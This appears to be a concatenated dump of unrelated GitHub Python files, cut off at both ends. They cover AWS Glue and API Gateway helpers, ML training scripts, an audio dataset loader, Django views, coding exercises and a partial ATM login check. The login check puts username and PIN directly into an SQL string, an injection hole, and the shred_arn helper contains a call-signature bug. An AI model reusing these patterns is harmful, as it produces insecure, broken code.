continue","repo_name":"Andrewf9001/combined_projects_devpipline","sub_path":"binary_calc.py","file_name":"binary_calc.py","file_ext":"py","file_size_in_byte":9644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31427247264","text":"import json\nimport datetime\nimport boto3\nimport os\nimport time\nimport logging\nimport pystache\nfrom distutils import util as _util\nfrom chalicelib.data_api_encoder import DataApiEncoder\nimport chalicelib.glue_export_dynamo_table as export_utils\nfrom chalicelib.exceptions import DetailedException, ResourceNotFoundException\nimport chalicelib.parameters as params\n\n_sts_client = None\n_iam_client = None\n\n\ndef setup_logging(set_name: str = None):\n logging.basicConfig()\n log = logging.getLogger(params.AWS_DATA_API_NAME if set_name is None else set_name)\n log.setLevel(params.DEFAULT_LOG_LEVEL)\n\n log_level = os.getenv(params.LOG_LEVEL_PARAM)\n if log_level is not None:\n log.info(f\"Setting Log Level to {log_level}\")\n log.setLevel(log_level.upper())\n\n return log\n\n\ndef __precheck_config(config_dict):\n # pre-check settings for the pystache template\n if config_dict.get(\"stage_name\").lower() != 'prod' or (\n config_dict.get(\"stage_name\").lower() == 'prod' and config_dict.get(\"enable_xray\") is True):\n config_dict[\"use_xray\"] = True\n\n if config_dict.get(\"auth\") is not None:\n config_dict[\"use_auth\"] = True\n\n if config_dict.get(\"cors_domain\") is not None:\n config_dict[\"custom_cors\"] = True\n\n if config_dict.get(\"auth\") == params.AUTHORIZER_COGNITO:\n if config_dict.get(\"cog_pool_name\") is not None and config_dict.get(\"cog_provider_arns\") is not None:\n config_dict[\"use_cognito\"] = True\n else:\n raise Exception(\"Misconfigured Cognito Authorization. Requires User Pool name and Provider ARNS\")\n\n if config_dict.get(\"custom_domain_name\") is not None:\n config_dict[\"custom_domain\"] = True\n\n if config_dict.get(\"custom_url_prefix\") is not None:\n config_dict[\"use_custom_prefix\"] = True\n\n\ndef generate_configuration_files(config_dict, generate_action, verbose):\n __precheck_config(config_dict)\n\n # generate the config.json file to .chalice\n if not os.path.exists(\".chalice\"):\n os.mkdir(\".chalice\")\n\n __export_template_to_file(\"template/config.pystache\", \".chalice/config.json\", config_dict, generate_action, verbose)\n\n # generate the iam policy\n __export_template_to_file(\"template/iam_policy.pystache\", \"iam_policy.json\", config_dict, generate_action, verbose)\n\n # generate the cors config\n if config_dict.get(\"allow_all_cors\") is True or config_dict.get(\"cors_domain\") is not None:\n __export_template_to_file(\"template/cors.pystache\", \"chalicelib/cors.json\", config_dict, generate_action,\n verbose)\n\n\ndef __export_template_to_file(template_file, output_file, config_doc, generate_action=None, verbose=False):\n # import the template file\n print(\"Target: %s\" % output_file)\n\n with open(template_file) as t:\n template = t.read()\n\n # create a renderer\n renderer = pystache.Renderer()\n\n rendered = renderer.render(template, config_doc)\n\n if generate_action != 'dry-run':\n # open the file for writing\n with open(output_file, 'w+') as out:\n out.write(rendered)\n\n out.close()\n\n print(\"Generated configuration successfully\")\n\n if verbose is True:\n print(rendered)\n\n\ndef identity_trace(f):\n def resolve_identity(self, *args, **kwargs):\n self._logger.debug(f\"Function: {f.__name__}\")\n self._logger.debug(f\"ARGS: {args}\")\n self._logger.debug(f\"KWARGS: {kwargs}\")\n\n # set the class' caller identity if we can get it\n try:\n if self._caller_identity is None:\n self._caller_identity = get_caller_identity()\n self._simple_identity = get_caller_simplename(self._caller_identity)\n except Exception as e:\n self._logger.error(e)\n\n # return the decorated function\n return f(self, *args, **kwargs)\n\n return resolve_identity\n\n\ndef strtobool(val):\n # wrapping distutils as I actually want a boolean\n return _util.strtobool(val) == 1\n\n\n# method to generate the ID for a metadata entry\ndef get_metaid(id):\n return f\"{id}-meta\"\n\n\n# method to return the name of the metadata table for a data API element\ndef get_metaname(name):\n return f\"{name}-Metadata\"\n\n\ndef remove_internal_attrs(dict):\n dict.pop(params.APP, None)\n dict.pop(params.LAST_UPDATED_BY, None)\n dict.pop(params.LAST_UPDATE_DATE, None)\n dict.pop(params.LAST_UPDATE_ACTION, None)\n dict.pop('api', None)\n dict.pop('type', None)\n\n\ndef _get_sts_client():\n global _sts_client\n if _sts_client is not None:\n return _sts_client\n else:\n _sts_client = boto3.client(\"sts\", region_name=get_region())\n\n return _sts_client\n\n\ndef get_region():\n return os.getenv('AWS_REGION')\n\n\ndef get_request_router_logger_name(stage: str) -> str:\n return f'RequestRouter-{stage}' if stage.lower() != 'prod' else 'RequestRouter'\n\n\ndef get_caller_account():\n return _get_sts_client().get_caller_identity()[\"Account\"]\n\n\ndef get_caller_simplename(_identity):\n return f\"{_identity['Account']}.{_identity['UserId']}\"\n\n\ndef get_caller_identity():\n return _get_sts_client().get_caller_identity()\n\n\ndef get_es_index_name(table_name, index_prefix):\n return f'{params.AWS_DATA_API_NAME.lower()}-{table_name.lower()}-{index_prefix.lower()}'\n\n\ndef get_es_type_name(table_name, index_prefix):\n return f'{table_name}-{index_prefix}'\n\n\n# method to generate an ARN for an Item in a table\ndef get_arn(id, table_name, deployed_account):\n return f\"{get_arn_base()}:{get_region()}:{deployed_account}:{table_name}:{id}\"\n\n\ndef versioned_arn(id, table_name, deployed_account, item_version):\n return f\"{get_arn(id, table_name, deployed_account)}:{item_version}\"\n\n\ndef shred_arn(arn):\n if \":\" not in arn:\n return None\n else:\n tokens = arn.split(\":\")\n\n def _get_arn(with_dict):\n d = {\n params.ARN_REGION: tokens[3],\n params.ARN_ACCOUNT: tokens[4],\n params.ARN_TABLE: tokens[5],\n params.ARN_ID: tokens[6]\n }\n\n if with_dict is not None:\n d.update(with_dict)\n\n return d\n\n if len(tokens) == 7:\n return _get_arn()\n elif len(tokens) == 8:\n return _get_arn({\n params.ITEM_VERSION: tokens[7]\n })\n else:\n return None\n\n\ndef get_arn_base():\n return f\"arn:aws:{params.AWS_DATA_API_SHORTNAME}\"\n\n\ndef decorate(content):\n return json.dumps(content, indent=4, cls=DataApiEncoder)\n\n\ndef get_time_now():\n return time.time()\n\n\ndef get_datetime_now():\n return datetime.datetime.now()\n\n\ndef get_date_now(fmt=None):\n if fmt is None:\n return get_datetime_now().strftime(params.DEFAULT_DATE_FORMAT)\n else:\n return get_datetime_now().strftime(fmt)\n\n\ndef get_table_name(table_name, deployment_stage):\n return f\"{table_name}-{deployment_stage}\"\n\n\ndef _get_client(name: str):\n return boto3.client(name, region_name=get_region())\n\n\ndef _get_glue_client():\n return _get_client('glue')\n\n\ndef create_s3_crawler(crawler_name, target_entity_name, crawler_rolename, catalog_db, s3_path, and_run=False):\n glue_client = _get_glue_client()\n\n try:\n glue_client.create_crawler(\n Name=crawler_name,\n Role=crawler_rolename,\n DatabaseName=catalog_db,\n Description=f'Crawler for S3 Data API Export {target_entity_name}',\n Targets={\n 'S3Targets': [\n {\n 'Path': s3_path\n }\n ],\n },\n # run every hour on the hour\n Schedule='cron(0 * * * ? *)',\n SchemaChangePolicy={\n 'UpdateBehavior': 'UPDATE_IN_DATABASE',\n }\n )\n except glue_client.exceptions.AlreadyExistsException:\n pass\n\n if and_run is True:\n glue_client.start_crawler(Name=crawler_name)\n\n return crawler_name\n\n\ndef get_all_data_apis():\n log = setup_logging()\n\n api_gw = _get_client(\"apigateway\")\n region = get_region()\n response = {}\n custom_domains = {}\n\n # load api custom domain names\n all_custom_domains = api_gw.get_domain_names()\n if \"items\" in all_custom_domains:\n for domain in all_custom_domains.get(\"items\"):\n if \"tags\" in domain and \"source\" in domain.get(\"tags\") and domain.get(\"tags\").get(\n \"source\") == params.AWS_DATA_API_NAME:\n # get base path mappings for the domain\n base_path_mappings = api_gw.get_base_path_mappings(domainName=domain.get(\"domainName\"))\n if base_path_mappings is not None and \"items\" in base_path_mappings:\n for path in base_path_mappings.get(\"items\"):\n custom_domains[path.get('restApiId')] = {\n \"api\": path.get('restApiId'),\n \"stage\": path.get('stage'),\n \"basePath\": path.get('basePath'),\n \"url\": domain.get(\"domainName\"),\n \"cf\": domain.get(\"distributionDomainName\")\n }\n\n # grab all rest API's and match them to Data API's\n all_apis = api_gw.get_rest_apis()\n if \"items\" in all_apis:\n for api in all_apis.get(\"items\"):\n if params.AWS_DATA_API_SHORTNAME in api.get(\"name\"):\n stage = api.get(\"name\").replace(f\"{params.AWS_DATA_API_SHORTNAME}-\", \"\")\n\n # TODO remove this restriction to support custom stage names\n if stage.lower() in ['dev', 'test', 'prod', 'int']:\n entry = {\n \"Endpoint\": f\"https://{api.get('id')}.execute-api.{region}.amazonaws.com\",\n \"Stage\": stage\n }\n\n # check for a custom domain name\n domain_info = custom_domains.get(api.get('id'))\n if domain_info is not None:\n entry[\"URL\"] = f\"https://{domain_info.get('url')}\"\n entry[\"DistributionDomainName\"] = domain_info.get(\"cf\")\n\n if domain_info.get('basePath') is not None and domain_info.get('basePath') != '(none)':\n entry[\"BasePath\"] = domain_info.get('basePath')\n\n response[stage] = entry\n\n return response\n\n\ndef verify_crawler(table_name, crawler_rolename, catalog_db):\n glue_client = _get_glue_client()\n\n try:\n glue_client.get_crawler(Name=table_name)\n except glue_client.exceptions.EntityNotFoundException:\n glue_client.create_crawler(\n Name=table_name,\n Role=crawler_rolename,\n DatabaseName=catalog_db,\n Description=f'Crawler for AWS Data API Table {table_name}',\n Targets={\n 'DynamoDBTargets': [\n {\n 'Path': table_name\n },\n ]\n },\n # run every hour on the hour\n Schedule='cron(0 * * * ? *)',\n SchemaChangePolicy={\n 'UpdateBehavior': 'UPDATE_IN_DATABASE',\n }\n )\n\n\ndef run_glue_export(table_name, s3_export_path, kms_key_arn, read_pct, log_path, export_role, dpu):\n glue_client = _get_glue_client()\n\n security_config = None\n try:\n crypt = {\n 'S3EncryptionMode': 'SSE-S3' if kms_key_arn is None else \"SSE-KMS\"\n }\n if kms_key_arn is not None:\n crypt['KmsKeyArn'] = kms_key_arn\n\n security_config = f\"{params.AWS_DATA_API_SHORTNAME}-ddb-export-config\"\n glue_client.create_security_configuration(\n Name=security_config,\n EncryptionConfiguration={\n 'S3Encryption': [crypt],\n 'CloudWatchEncryption': {\n 'CloudWatchEncryptionMode': 'DISABLED'\n },\n 'JobBookmarksEncryption': {\n 'JobBookmarksEncryptionMode': 'DISABLED'\n }\n }\n )\n except glue_client.exceptions.AlreadyExistsException:\n pass\n\n job_name = f\"{params.AWS_DATA_API_SHORTNAME}-{table_name}\"\n\n try:\n glue_client.create_job(\n Name=job_name,\n Description=f\"{params.AWS_DATA_API_NAME} Data Export to S3\",\n LogUri=log_path,\n Role=export_role,\n Command={\n 'Name': 'glueetl',\n 'ScriptLocation': f\"s3://awslabs-code-{get_region()}/{params.AWS_DATA_API_NAME}/glue_export_dynamo_table.py\",\n 'PythonVersion': '3'\n },\n MaxRetries=3,\n Timeout=1000,\n SecurityConfiguration=security_config\n )\n except glue_client.exceptions.IdempotentParameterMismatchException:\n # thrown when the job already exists\n pass\n\n def _argname(v):\n return f\"--{v}\"\n\n args = {\n _argname(export_utils.EXPORT_ARG_TABLE_NAME): table_name,\n _argname(export_utils.EXPORT_ARG_READ_PCT): str(read_pct),\n _argname(export_utils.EXPORT_ARG_PREFIX): s3_export_path,\n # only support compressed json formatting for now\n _argname(export_utils.EXPORT_ARG_FORMAT): \"json\"\n }\n\n try:\n response = glue_client.start_job_run(\n JobName=job_name,\n Arguments=args,\n AllocatedCapacity=dpu\n )\n\n if response is not None and 'JobRunId' in response:\n return {\n \"JobName\": job_name,\n \"JobRunId\": response['JobRunId']\n }\n else:\n return {\n \"Message\": \"Unable to start Glue Export or other error\"\n }\n except glue_client.exceptions.ConcurrentRunsExceededException as ce:\n raise DetailedException(message=\"Export Job Already Running\")\n\n\ndef get_running_export_jobs(job_name):\n glue_client = _get_glue_client()\n\n response = glue_client.get_job_runs(\n JobName=job_name\n )\n\n if response is None:\n raise ResourceNotFoundException(f\"Unable to resolve Job Name {job_name}\")\n else:\n running = []\n if 'JobRuns' in response:\n for j in response['JobRuns']:\n status = j['JobRunState']\n\n if not any(x in status for x in ['STARTING', 'RUNNING', 'STOPPING']):\n pass\n else:\n running.append(_extract_glue_job_status(j))\n\n return running\n\n\ndef _extract_glue_job_status(job):\n output = {\n \"Status\": job['JobRunState'],\n \"Started\": job['StartedOn'].strftime(params.DEFAULT_DATE_FORMAT),\n 'ExecutedDuration': job['ExecutionTime']\n }\n\n if 'CompletedOn' in job:\n output['Completed'] = job['CompletedOn'].strftime(params.DEFAULT_DATE_FORMAT)\n\n if 'ErrorMessage' in job:\n output['ErrorMessage'] = job['ErrorMessage']\n\n if 'Arguments' in job:\n output['Arguments'] = job['Arguments']\n\n return {job['Id']: output}\n\n\ndef get_glue_job_status(job_name, run_id):\n glue_client = _get_glue_client()\n\n try:\n response = glue_client.get_job_run(\n JobName=job_name,\n RunId=run_id\n )\n\n if response is not None:\n return _extract_glue_job_status(response['JobRun'])\n except glue_client.exceptions.EntityNotFoundException:\n raise ResourceNotFoundException(\"Unable to resolve Job Name or Run ID\")\n","repo_name":"awslabs/aws-data-api","sub_path":"chalicelib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15507,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"60"} +{"seq_id":"32311442269","text":"import sys\n\nsys.path.append(\"../src\")\n\nimport torch\nimport torch.nn as nn\nfrom models.autoencoder import AutoEncoder, RMSELoss\nfrom data_preparation import DataPreparation\nimport configures_manner\n\ndata_infos = {\n \"repo\": \"p971074907\",\n \"path\": \"brl:rn\",\n \"inputFeatures\": \"date:newDeaths\",\n \"inputWindowSize\": \"7\",\n \"begin\": \"2020-03-13\",\n \"end\": \"2020-07-15\",\n}\nconfigures_manner.add_all_configures_to_globals(data_infos)\n\nrepo = \"p971074907\"\npath = \"brl:rn\"\ninputFeatures = \"date:newDeaths\"\ninputWindowSize = \"7\"\nbegin = \"2020-03-13\"\nend = \"2020-07-15\"\n\ndata_instance = DataPreparation()\ndata = data_instance.get_data(repo, path, inputFeatures, inputWindowSize, begin, end)\n\nforward_len = 7\ndata_instance.data_tensor_generate(forward_len)\n\nprct_to_train = 0.7\ndata_instance.train_test_split_by_percent(prct_to_train)\n\nbatch_s = 8\ndata_instance.dataloader_create(batch_s)\n\nmodel_hyperparameters = {\n \"inseqlen\": 7,\n \"outseqlen\": 7,\n \"growth\": 4,\n \"latent_space_dim\": 7,\n \"n_features\": 1,\n \"n_targets\": 1,\n \"ae_archtecture_list\": [20, 30, 50],\n \"activation\": \"ReLU\",\n \"epochs\": 100,\n \"seed\": 51,\n \"learning_rate\": 0.0005,\n}\n\nmodel = AutoEncoder(model_hyperparameters)\nmodel.train(data_instance)\nprint(\"Model Trained\")\n\nto_predict = data_instance.X_test\npred = model.predicting(to_predict)\n\nmodel.save_model()\nytrue = data_instance.Y_test\nyhat = pred\n\ns, ss = model.score_calculator(ytrue, yhat)\nprint(s, ss)\n","repo_name":"Natalnet/ncovid-miae-forecast","sub_path":"tests/test_autoencoder.py","file_name":"test_autoencoder.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25163447835","text":"import os, torch\nimport torchaudio\nimport pandas as pd\nimport numpy as np\nfrom torchaudio.transforms import Resample\nfrom torch.utils.data import Dataset, DataLoader\nfrom transformers import Wav2Vec2FeatureExtractor\n\n\ns = \\\n\"\"\"\n03 : male, 31 years old\n08 : female, 34 years\n09 : female, 21 years\n10 : male, 32 years\n11 : male, 26 years\n12 : male, 30 years\n13 : female, 32 years\n14 : female, 35 years\n15 : male, 25 years\n16 : female, 31 years\n\"\"\"\n\nactor_dict = {}\nfor sent in s.split(\"\\n\"):\n if len(sent) > 0:\n sent = sent.split(\":\")\n key = sent[0].strip()\n value = sent[1].split(\",\")[0].strip()\n actor_dict[key] = value\n\n\nclass EMODBDataset(Dataset):\n def __init__(self, \n data_path = \"//home/nl438/rds/hpc-work/PROJECT/data/emodb_data/wav/\",\n iemocap_only = True,\n set = \"train\"):\n self.audio_path = data_path\n\n self.emotion_dict = {'A' : \"fear\",\n 'E': \"disgust\",\n \"L\" : \"boredom\",\n \"T\" : \"sadness\",\n \"W\": \"anger\",\n \"F\": \"joy\",\n \"N\": \"neutral\"\n }\n\n if iemocap_only:\n self.emodb2iemocap = {\"sadness\": \"sad\",\n \"anger\": \"ang\",\n \"joy\": \"hap\",\n \"neutral\": \"neu\"\n }\n self.class_dict = {\"neu\": 0, \"hap\": 1, \"ang\": 2, \"sad\": 3}\n else:\n self.emodb2iemocap = {\"sadness\": \"sad\",\n \"anger\": \"ang\",\n \"joy\": \"hap\",\n \"neutral\": \"neu\",\n \"sor\": \"sur\"\n }\n self.class_dict = {\"neu\": 0, \"hap\": 1, \"ang\": 2, \"sad\": 3, \"sur\": 4} \n self.id2emo = {v:k for k,v in self.class_dict.items()}\n self.wavs = []\n self.labels = []\n self.names = []\n self.glabels = []\n if set == \"train\":\n self.actors = [ \"11\", \"12\", \"13\", \"14\", \"15\", \"16\"]\n if set == \"test\":\n self.actors = [\"03\", \"08\", \"09\", \"10\" ]\n self.load()\n\n def __len__(self,):\n return len(self.wavs)\n\n def load(self):\n wavs = []\n labels = []\n audio_files = sorted(os.listdir(self.audio_path))\n pname = audio_files[0]\n for audio_file in audio_files[1:]:\n full_audio_file = os.path.join(self.audio_path, audio_file)\n actor = audio_file[:2]\n emo_label = self.emotion_dict[audio_file[5]]\n if actor in self.actors and emo_label in self.emodb2iemocap and pname[:6]!=audio_file[:6]:\n wav, sr = torchaudio.load(full_audio_file)\n wav = wav.squeeze(0)\n label = self.class_dict[self.emodb2iemocap[emo_label]]\n wavs.append(wav)\n labels.append(label)\n self.glabels.append(actor_dict[actor][0] + str(label))\n self.names.append(pname)\n pname = audio_file\n else:\n pname = audio_file\n continue\n\n \n\n self.wavs = wavs\n self.labels = labels\n\n def __getitem__(self, \n id):\n audio = self.wavs[id]\n label = self.labels[id]\n audio_len = len(audio)\n return audio, audio_len, label\n \n \nSAMPLE_RATE = 16000\nMIN_SECOND = 0.05\ndef wav_transform( wavs,\n wavs_len):\n original_wavs_len = wavs_len\n if max(original_wavs_len) < MIN_SECOND * SAMPLE_RATE:\n padded_samples = int(MIN_SECOND * SAMPLE_RATE) - max(original_wavs_len)\n wavs = torch.cat(\n (wavs, wavs.new_zeros(wavs.size(0), padded_samples)),\n dim=1,\n )\n print(wavs_len)\n wavs_len = wavs_len + padded_samples\n\n wavs_list = []\n for wav, wav_len in zip(wavs, wavs_len):\n wavs_list.append(wav[:wav_len].numpy())\n\n max_wav_len = int(max(wavs_len)) \n return wavs_list, original_wavs_len, max_wav_len\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n\nclass EMODBCollator():\n def __init__(self,\n path,\n return_attention_mask=True,\n do_normalize=True,\n sample_rate=16000):\n \n self.sample_rate = sample_rate\n self.feature_extractor = Wav2Vec2FeatureExtractor.from_pretrained(path,\n return_attention_mask=return_attention_mask,\n do_normalize=do_normalize)\n\n\n def __call__(self,\n samples):\n\n wavs, wavs_len, labels = list(zip(*samples)) \n labels = torch.LongTensor(labels)\n wavs_list, _, _ = wav_transform(wavs, wavs_len)\n input_values = self.feature_extractor(\n wavs_list,\n return_tensors=\"pt\",\n padding=True,\n return_attention_mask=True,\n sampling_rate=self.sample_rate)\n\n\n \n return {\"input_values\": input_values[\"input_values\"], \n \"attention_mask\": input_values[\"attention_mask\"],\n \"labels\": labels}","repo_name":"NLashkarashvili/Thesis","sub_path":"data_prep/EMODB/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72783930111","text":"def calc_matrix(n,matrix):\n sum1,sum2=0,0\n for i in range(0,n):\n for j in range(0,n):\n if i==j:\n sum1=sum1+matrix[i][j]\n if (i+j)==n-1:\n sum2=sum2+matrix[i][j]\n else:\n continue\n print(abs(sum1-sum2))\nn=int(input())\nmatrix=[]\nfor i in range(0,n):\n element=[int(i) for i in input().split()]\n matrix.append(element)\ncalc_matrix(n,matrix)\n ","repo_name":"abhaykatheria/cp","sub_path":"HackerRank2/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"2933661748","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics, preprocessing\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\n\n\ndef classification_tree(X_train, X_test, y_train, y_test):\n print(\"------------------ C - 1 - Classification Tree ------------------\")\n\n model_start_time = time.time()\n\n # Create a dictionary of all the parameter options\n param_grid = {'criterion': ['gini'],\n 'max_leaf_nodes': list(range(2, 100)),\n 'max_depth': [13, 14, 15, 16],\n 'min_samples_split': [2, 3, 4, 5]}\n\n # Create a grid search object\n gsDCT = GridSearchCV(DecisionTreeClassifier(), param_grid,\n cv=5, scoring='accuracy')\n\n # Fit the grid search\n gsDCT.fit(X_train, y_train)\n\n print(gsDCT.best_estimator_)\n\n # Predict the response for test dataset\n y_pred = gsDCT.predict(X_test)\n\n elapsed_time = time.time() - model_start_time\n print('Elapsed Time : {}', time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time)))\n\n # Model Accuracy, how often is the classifier correct?\n print(\"Accuracy :\", metrics.accuracy_score(y_test, y_pred))\n\n\ndef classification_forest(X_train, X_test, y_train, y_test):\n print(\"------------------ C - 1 - Classification Forest ------------------\")\n model_start_time = time.time()\n # Hyperparameter grid\n param_grid = {\n 'n_estimators': [80, 100, 150, 180], # The number of trees in the forest.\n 'max_depth': [10, 20, 30], # The maximum depth of the tree.\n 'max_features': ['sqrt'], # he number of features to consider when looking for the best split\n 'min_samples_split': [2, 5, 9, 10], # The minimum number of samples required to split an internal node\n 'bootstrap': [True] # Whether bootstrap samples are used when building trees.\n }\n\n # Create a grid search object\n gsRFC = GridSearchCV(RandomForestClassifier(), param_grid, n_jobs=-1,\n scoring='accuracy', cv=5)\n\n # Fit\n gsRFC.fit(X_train, y_train)\n print(gsRFC.best_params_)\n\n best_model = gsRFC.best_estimator_\n random_pred = best_model.predict(X_test)\n\n elapsed_time = time.time() - model_start_time\n print('Elapsed Time : {}', time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time)))\n\n print(\"Accuracy:\", metrics.accuracy_score(y_test, random_pred))\n\n\ndef regression_tree(X_train, X_test, y_train, y_test):\n print(\"------------------ C - 2 - Regression Tree ------------------\")\n model_start_time = time.time()\n # Create a dictionary of all the parameter options\n param_grid = {\n 'max_leaf_nodes': list(range(10, 60)),\n 'max_depth': [10, 12, 14],\n 'min_samples_split': [2, 3, 4, 5]}\n\n # Create a grid search object\n gsDCT = GridSearchCV(DecisionTreeRegressor(), param_grid, cv=5)\n\n # Fit the grid search\n gsDCT.fit(X_train, y_train)\n\n print(gsDCT.best_estimator_)\n # Predict the response for test dataset\n y_pred = gsDCT.predict(X_test)\n\n elapsed_time = time.time() - model_start_time\n print('Elapsed Time : {}', time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time)))\n\n # Model Accuracy, how often is the classifier correct?\n print(\"MSE :\", metrics.mean_squared_error(y_test, y_pred))\n\n\ndef regression_forest(X_train, X_test, y_train, y_test):\n print(\"------------------ C - 2 - Regression Forest ------------------\")\n model_start_time = time.time()\n # Hyperparameter grid\n param_grid = {\n 'n_estimators': [100, 150, 200, 250], # The number of trees in the forest.\n 'max_depth': [None, 10, 20, 30], # The maximum depth of the tree.\n 'max_features': ['sqrt'], # he number of features to consider when looking for the best split\n 'min_samples_split': [2, 5, 10, 15], # The minimum number of samples required to split an internal node\n 'bootstrap': [True] # Whether bootstrap samples are used when building trees.\n }\n\n # Create a grid search object\n gsRFC = GridSearchCV(RandomForestRegressor(), param_grid, n_jobs=-1, cv=5)\n\n # Fit\n gsRFC.fit(X_train, np.ravel(y_train, order='C'))\n print(gsRFC.best_params_)\n\n best_model = gsRFC.best_estimator_\n random_pred = best_model.predict(X_test)\n\n elapsed_time = time.time() - model_start_time\n print('Elapsed Time : {}', time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time)))\n\n print(\"MSE after optimization:\", metrics.mean_squared_error(y_test, random_pred))\n\n\ndef encode_features(my_data):\n encode = preprocessing.LabelEncoder()\n features = categorical_cols(my_data)\n for x in features:\n my_data[x] = (encode.fit_transform(my_data[x]))\n return my_data\n\n\ndef categorical_cols(my_data):\n cols = my_data.columns\n num_cols = my_data._get_numeric_data().columns\n feature_col = list(set(cols) - set(num_cols))\n return feature_col\n\n\nif __name__ == \"__main__\":\n data = pd.read_excel(\"adult_income.xlsx\", sheet_name='adult_income_data', header=0) # 30162 rows\n\n # 1)\tTrain: rows 1-19,034.\n # 2)\tValidation: rows 19,035-24,130.\n # 3)\tTest: rows 24,130-end.\n\n feature_cols = data.columns\n # get all columns but the last ( last columns is the class )\n feature_cols = feature_cols[:-1]\n X = data[feature_cols]\n\n # (1) which is classification using a tree and a forest\n\n # DATA FOR CLASSIFICATION\n\n # encode all categorical features\n X = encode_features(X)\n\n # class is the last columns\n y = data[data.columns[-1]]\n target_col = data.columns[-1]\n\n y = y.to_numpy()\n X_2 = X.to_numpy()\n\n X1_train, X1_test, y1_train, y1_test = train_test_split(X_2, y, test_size=0.19995, random_state=1)\n\n # BUILD THE TREE / FOREST\n\n classification_tree(X1_train, X1_test, y1_train, y1_test)\n classification_forest(X1_train, X1_test, y1_train, y1_test)\n\n # (2) Regression using both a tree and forest\n\n # DATA FOR REGRESSION\n cols_to_drop = ['education', 'education-num', 'occupation', '>50K']\n y2 = X[['education-num']]\n X2 = data.drop(cols_to_drop, axis=1)\n\n # encode all categorical features\n X2 = encode_features(X2)\n\n y2 = y2.to_numpy()\n X2 = X2.to_numpy()\n\n X2_train, X2_test, y2_train, y2_test = train_test_split(X2, y2, test_size=0.19995, random_state=1)\n\n # BUILD THE TREE / FOREST\n\n regression_tree(X2_train, X2_test, y2_train, y2_test)\n regression_forest(X2_train, X2_test, y2_train, y2_test)\n","repo_name":"Nareed/Machine-Learning-Assignments","sub_path":"Assignment01/SectionC.py","file_name":"SectionC.py","file_ext":"py","file_size_in_byte":6576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74330997952","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport markdown\nfrom .models import About, Project\n\n# Create your views here.\ndef index(request):\n print('---------- rendering About')\n cards = []\n for about in About.objects.all(): \n cards.append({\n 'title': about.title,\n 'sub_title_1': about.sub_title_1,\n 'sub_title_2': about.sub_title_2,\n 'content_1': about.content_1,\n 'content_2': about.content_2,\n })\n context = {\n 'title': 'about',\n 'path': '/', \n 'cards': cards,\n 'pages': pages(),\n }\n return render(request, 'index.html', context)\n\ndef projects(request):\n print('---------- rendering Projects')\n cards = []\n for project in Project.objects.all(): \n cards.append({\n 'title': project.title,\n 'sub_title': project.sub_title,\n 'link': project.link,\n 'image': project.image,\n })\n context = {\n 'title': 'projects',\n 'path': 'projects', \n 'cards': cards,\n 'pages': pages(),\n }\n return render(request, 'projects.html', context)\n\ndef pages(): \n return [\n {'title': 'about', 'path': '/'}, \n {'title': 'projects', 'path': 'projects'}, \n ]\n\ndef markdown_convert(text): \n md = markdown.Markdown(extensions=[\"markdown.extensions.meta\", \"markdown.extensions.attr_list\", \"markdown.extensions.extra\"])\n data = text\n return md.convert(text)\n","repo_name":"josh-p-thompson/about-me-django-orm","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38563744799","text":"# Py Adv W3 L5 Square with Maximum Sum\n\n# input 3, 6\n# 7, 1, 3, 3, 2, 1\n# 1, 3, 9, 8, 5, 6\n# 4, 6, 7, 9, 1, 0\n# output 9 8\n# 7 9\n# 33\n\n# Write a program that reads a matrix from the console.\n# On first line you will get matrix sizes in format \"{rows}, {columns}\".\n# On the next rows, you will get elements for each column separated with a \", \".\n# Find the 2x2 top-left submatrix\n# with biggest sum of its values.\n# Print the matrix and the sum of its elements as shown in the examples.\nimport sys\nmatrix = []\nmax_sum = -sys.maxsize\nrow, column = [int(el) for el in input().split(\", \")]\nfor _ in range(row):\n matrix.append([int(el) for el in input().split(\", \")])\nposition = None\nfor row in range(row-1, 0, -1):\n for column in range(column-1, 0, -1):\n a = matrix[row][column]\n b = matrix[row][column-1]\n c = matrix[row-1][column]\n d = matrix[row-1][column-1]\n current_sum = a + b + c + d\n if current_sum >= max_sum:\n max_sum = current_sum\n position = (row, column)\nrow, col = position\nprint(matrix[row-1][col-1], matrix[row-1][col])\nprint(matrix[row][col-1], matrix[row][col])\nprint(max_sum)","repo_name":"drgmzgb/Python-Advanced-","sub_path":"#3-Matrix/Py Adv W3 L5 Square with Maximum Sum.py","file_name":"Py Adv W3 L5 Square with Maximum Sum.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29358236616","text":"'''\ncek apakah username dan PIN cocok\njika cocok akan masuk menu ATM\njika tidak cocok akan kembali ke asal\n'''\n\nimport sqlite3\n\ndef cek_pengguna():\n # innitiate connection\n conn = sqlite3.connect('data.db')\n # create a cursor\n c = conn.cursor()\n # cek user valid atau tidak\n from ATM.run import masukkan_username,masukkan_pin\n c.execute(\"SELECT * FROM data_pelanggan WHERE username='{}'\"\n \"and pin='{}'\".format(masukkan_username, masukkan_pin))\n if 